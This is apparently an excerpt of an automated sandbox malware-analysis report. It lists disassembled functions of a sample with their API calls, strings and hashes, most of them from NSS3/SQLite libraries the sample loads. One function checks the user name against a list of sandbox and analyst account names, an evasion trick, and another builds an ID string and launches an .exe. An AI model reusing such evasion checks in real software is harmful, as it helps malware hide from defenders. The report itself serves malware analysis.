_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA21F34
PR_SetLogBuffering.NSS3(00004000), ref: 6CA21F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6CA21F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CA21F83
PR_SetLogFile.NSS3(00000000), ref: 6CA21FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6CA21FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6CA21FCB
free.MOZGLUE(00000000), ref: 6CA21FD2

Strings

append, xrefs: 6CA21EE6
Unable to create nspr log file '%s', xrefs: 6CA21FB3
sync, xrefs: 6CA21E46
all, xrefs: 6CA21F0E
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6CA21E27
NSPR_LOG_MODULES, xrefs: 6CA21DAD
bufsize, xrefs: 6CA21E9B
, %n, xrefs: 6CA21E6B
timestamp, xrefs: 6CA21EC4
NSPR_LOG_FILE, xrefs: 6CA21F69

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: 17e6e6c3409c58b262d21e30a0e5ba72a4f656b20d29f6400cc1f9cdcff1bbb6
Instruction ID: 4e134e6b84a664de591dcb59d2e12188640bebdc40279547fc359c36ee0e9422
Opcode Fuzzy Hash: 17e6e6c3409c58b262d21e30a0e5ba72a4f656b20d29f6400cc1f9cdcff1bbb6
Instruction Fuzzy Hash: FB51E7B1E002689BDF00DBE5DD44BAE77B8AF01309F1C0525EA15DBA00F37AD988CB91

Function 6CB06E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9BCA30: EnterCriticalSection.KERNEL32(?,?,?,6CA1F9C9,?,6CA1F4DA,6CA1F9C9,?,?,6C9E369A), ref: 6C9BCA7A
Part of subcall function 6C9BCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C9BCB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C9CBE66), ref: 6CB06E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C9CBE66), ref: 6CB06E98
sqlite3_snprintf.NSS3(?,00000000,6CB6AAF9,?,?,?,?,?,?,6C9CBE66), ref: 6CB06EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C9CBE66), ref: 6CB06ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C9CBE66), ref: 6CB06EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C9CBE66), ref: 6CB06F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C9CBE66), ref: 6CB06F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C9CBE66), ref: 6CB06F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C9CBE66), ref: 6CB06FA6
sqlite3_snprintf.NSS3(?,00000000,6CB6AAF9,00000000,?,?,?,?,?,?,?,6C9CBE66), ref: 6CB06FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C9CBE66), ref: 6CB06FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C9CBE66), ref: 6CB06FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C9CBE66), ref: 6CB07014
sqlite3_free.NSS3(00000000,?,?,?,?,6C9CBE66), ref: 6CB0701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C9CBE66), ref: 6CB07030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C9CBE66), ref: 6CB0705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C9CBE66), ref: 6CB07079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C9CBE66), ref: 6CB07097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C9CBE66), ref: 6CB070A0

Strings

winGetTempname2, xrefs: 6CB070C4
winGetTempname4, xrefs: 6CB07046
winGetTempname5, xrefs: 6CB07071
mz_etilqs_, xrefs: 6CB06F18
winGetTempname1, xrefs: 6CB0708F

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: 89df9b0b3b783e934aabdfc624d4e23435556361fac7694bf7be35f923f350a6
Instruction ID: 84b7296169d67a33449eeaf522d0ce25525860d40b47e16e342a033f5097aadb
Opcode Fuzzy Hash: 89df9b0b3b783e934aabdfc624d4e23435556361fac7694bf7be35f923f350a6
Instruction Fuzzy Hash: 72516CA1B142912BE71096309C51BBF3A6ADFA3328F144634EC15A7BC1FB35E50E82D3

Function 00424B17 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00424B1F
__mtterm.LIBCMT ref: 00424B2B

Part of subcall function 004247EA: DecodePointer.KERNEL32(FFFFFFFF), ref: 004247FB
Part of subcall function 004247EA: TlsFree.KERNEL32(FFFFFFFF), ref: 00424815

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00424B41
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00424B4E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00424B5B
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00424B68
TlsAlloc.KERNEL32 ref: 00424BB8
TlsSetValue.KERNEL32(00000000), ref: 00424BD3
__init_pointers.LIBCMT ref: 00424BDD
EncodePointer.KERNEL32 ref: 00424BEE
EncodePointer.KERNEL32 ref: 00424BFB
EncodePointer.KERNEL32 ref: 00424C08
EncodePointer.KERNEL32 ref: 00424C15
DecodePointer.KERNEL32(Function_0002496E), ref: 00424C36
__calloc_crt.LIBCMT ref: 00424C4B
DecodePointer.KERNEL32(00000000), ref: 00424C65
__initptd.LIBCMT ref: 00424C70
GetCurrentThreadId.KERNEL32 ref: 00424C77

Strings

KERNEL32.DLL, xrefs: 00424B1A
FlsAlloc, xrefs: 00424B3B
FlsFree, xrefs: 00424B5D
FlsGetValue, xrefs: 00424B43
FlsSetValue, xrefs: 00424B50

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3732613303-3819984048
Opcode ID: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
Instruction ID: 9e7d6304cc20a0816a56486267aa260185140d132a286571763312e702071250
Opcode Fuzzy Hash: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
Instruction Fuzzy Hash: F7312C35E053609ADB23AF7ABD0860A3BA4EF85722B51063BE410D32B1DBB9D440DF5D

Function 6CA94C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CA84F51,00000000), ref: 6CA94C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CA84F51,00000000), ref: 6CA94C5B
PR_smprintf.NSS3(6CB6AAF9,?,0000002F,?,?,?,00000000,00000000,?,6CA84F51,00000000), ref: 6CA94C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CA84F51,00000000), ref: 6CA94CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA94CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA94CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA94D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CA84F51,00000000), ref: 6CA94D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CA84F51,00000000), ref: 6CA94D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CA94D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CA94DA2
free.MOZGLUE(?), ref: 6CA94DB9
free.MOZGLUE(00000000), ref: 6CA94DCF

Strings

every, xrefs: 6CA94CA1
any, xrefs: 6CA94C96
slotFlags, xrefs: 6CA94D34
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6CA94D9D
rootFlags, xrefs: 6CA94D47
%s,%s, xrefs: 6CA94C4B
ootT, xrefs: 6CA94D1A
0x%08lx=[%s %s], xrefs: 6CA94D80
rust, xrefs: 6CA94D22
timeout, xrefs: 6CA94C91

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 66e83ef39eb3f608e52aa91a5ce2e0dda19fa9599d5e0250715bf43355d36c77
Instruction ID: a426d121f7dd2cf32b218b723621678cf6fde2c4c337ce00573567e6daeecfdc
Opcode Fuzzy Hash: 66e83ef39eb3f608e52aa91a5ce2e0dda19fa9599d5e0250715bf43355d36c77
Instruction Fuzzy Hash: 9141ADB59201816BDB119F15DC426BE3BB5AF8231CF0C4124E8251BB11E731E998C7D3

Function 00401927 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00401A13
lstrcmpiA.KERNEL32(0043ABCC,?), ref: 00401A2E

Strings

timmy, xrefs: 004019AF
sandbox, xrefs: 004019C3
maltest, xrefs: 004019D7
Peter Wilson, xrefs: 004019A5
WDAGUtilityAccount, xrefs: 004019FF
Hong Lee, xrefs: 00401973
test user, xrefs: 004019E1
Sand box, xrefs: 00401955
John Doe, xrefs: 004019F5
IT-ADMIN, xrefs: 0040197D
virus, xrefs: 004019EB
user, xrefs: 004019B9
CurrentUser, xrefs: 0040194B
milozs, xrefs: 0040199B
Emily, xrefs: 0040195F
HAPUBWS, xrefs: 00401969
Johnson, xrefs: 00401987
Miller, xrefs: 00401991
malware, xrefs: 004019CD

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameUserlstrcmpi
String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
API String ID: 542268695-1784693376
Opcode ID: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
Instruction ID: b7e7ac9f27e83d335140a50ac772a364dc2a7579303695bb9c42e1fce2a6af08
Opcode Fuzzy Hash: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
Instruction Fuzzy Hash: B42103B094526C8BCB20CF159D4C6DDBBB5AB5D308F00B1DAD1886A210C7B85ED9CF4D

Function 6CA3DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CA3DDDE

Part of subcall function 6CA90FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA387ED,00000800,6CA2EF74,00000000), ref: 6CA91000
Part of subcall function 6CA90FF0: PR_NewLock.NSS3(?,00000800,6CA2EF74,00000000), ref: 6CA91016
Part of subcall function 6CA90FF0: PL_InitArenaPool.NSS3(00000000,security,6CA387ED,00000008,?,00000800,6CA2EF74,00000000), ref: 6CA9102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CA3DDF5

Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA910F3
Part of subcall function 6CA910C0: EnterCriticalSection.KERNEL32(?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9110C
Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91141
Part of subcall function 6CA910C0: PR_Unlock.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91182
Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CA3DE34
PR_Now.NSS3 ref: 6CA3DE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CA3DE9D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA3DEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA3DEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CA3DED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6CA3DEF0
PR_smprintf.NSS3(6CB6AAF9,(NULL) (Validity Unknown)), ref: 6CA3DF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA3DF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA3DF22
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA3DF33
free.MOZGLUE(00000000), ref: 6CA3DF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA3DF4B
free.MOZGLUE(00000000), ref: 6CA3DF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA3DF8E

Strings

%s%s, xrefs: 6CA3DEEB
(NULL) (Validity Unknown), xrefs: 6CA3DEFA
{???}, xrefs: 6CA3DE8B

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: 26f05035f164721fa0c478698ebac3580b5f945324a3bd1e4e9a9effc40ac412
Instruction ID: 111be87a0d80aed0d18b0c5fa3d8a6d647de763b655fa37cf3c6c6fb4e4ec788
Opcode Fuzzy Hash: 26f05035f164721fa0c478698ebac3580b5f945324a3bd1e4e9a9effc40ac412
Instruction Fuzzy Hash: 5751D3B1D102619BDB00DE659C91ABF7AF8AF95398F184028E80DE7B00E731D955CBE2

Function 0041260C Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 204stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

_memset.LIBCMT ref: 004127B1
lstrcatA.KERNEL32(?,?,?,?,?), ref: 004127C3
lstrcatA.KERNEL32(?,00436698), ref: 004127D5
lstrcatA.KERNEL32(?,b26735cbe8ca9e75712ffe3aa40c4a60), ref: 004127E7
lstrcatA.KERNEL32(?,0043669C), ref: 004127F9
lstrcatA.KERNEL32(?,?), ref: 00412809
lstrcatA.KERNEL32(?,004366A0), ref: 0041281B
lstrlenA.KERNEL32(?), ref: 00412824
lstrcatA.KERNEL32(?,EMPTY), ref: 00412840
lstrcatA.KERNEL32(?,004366AC), ref: 00412852
lstrcatA.KERNEL32(?,?), ref: 00412862
lstrcatA.KERNEL32(?,004366B0), ref: 00412874
lstrlenA.KERNEL32(?), ref: 00412881
_memset.LIBCMT ref: 004128B7

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,004366B4,?), ref: 00412924
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00412932

Strings

.exe, xrefs: 0041264F
EMPTY, xrefs: 0041283A
b26735cbe8ca9e75712ffe3aa40c4a60, xrefs: 004127DB

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
String ID: .exe$EMPTY$b26735cbe8ca9e75712ffe3aa40c4a60
API String ID: 141474312-1726762705
Opcode ID: 7423630355bc0ae080dcc3895a676b474c595fadf28ca0ec63f6465bb34c18d8
Instruction ID: 30b7237e4d63740a0c3ffa21d4e9ba1d0fd5571b7a7901b34f1eecf9535dda31
Opcode Fuzzy Hash: 7423630355bc0ae080dcc3895a676b474c595fadf28ca0ec63f6465bb34c18d8
Instruction Fuzzy Hash: 99814FB2E40129ABCF11EF61DD46ACD7779AB08309F4054BAB708B3051D679AFC98F58

Function 6CA72D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CA72DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CA72E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CA72E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CA72E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CA44F1C,?,-00000001,00000000,?), ref: 6CA72E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CA44F1C,?,-00000001,00000000), ref: 6CA72E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CA72EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CA72EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CA72EF8
PR_Unlock.NSS3(?), ref: 6CA72F62
TlsGetValue.KERNEL32 ref: 6CA72F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6CA72F9E
PR_Unlock.NSS3(?), ref: 6CA72FCA
TlsGetValue.KERNEL32 ref: 6CA7301A
EnterCriticalSection.KERNEL32(?), ref: 6CA7302E
PR_Unlock.NSS3(?), ref: 6CA73066
PR_SetError.NSS3(00000000,00000000), ref: 6CA73085
PR_Unlock.NSS3(?), ref: 6CA730EC
TlsGetValue.KERNEL32 ref: 6CA7310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6CA73124
PR_Unlock.NSS3(?), ref: 6CA7314C

Part of subcall function 6CA59180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CA8379E,?,6CA59568,00000000,?,6CA8379E,?,00000001,?), ref: 6CA5918D
Part of subcall function 6CA59180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CA8379E,?,6CA59568,00000000,?,6CA8379E,?,00000001,?), ref: 6CA591A0

Part of subcall function 6CA207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9B204A), ref: 6CA207AD
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9B204A), ref: 6CA207CD
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9B204A), ref: 6CA207D6
Part of subcall function 6CA207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9B204A), ref: 6CA207E4
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,6C9B204A), ref: 6CA20864
Part of subcall function 6CA207A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA20880
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,?,6C9B204A), ref: 6CA208CB
Part of subcall function 6CA207A0: TlsGetValue.KERNEL32(?,?,6C9B204A), ref: 6CA208D7
Part of subcall function 6CA207A0: TlsGetValue.KERNEL32(?,?,6C9B204A), ref: 6CA208FB

PR_SetError.NSS3(00000000,00000000), ref: 6CA7316D

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
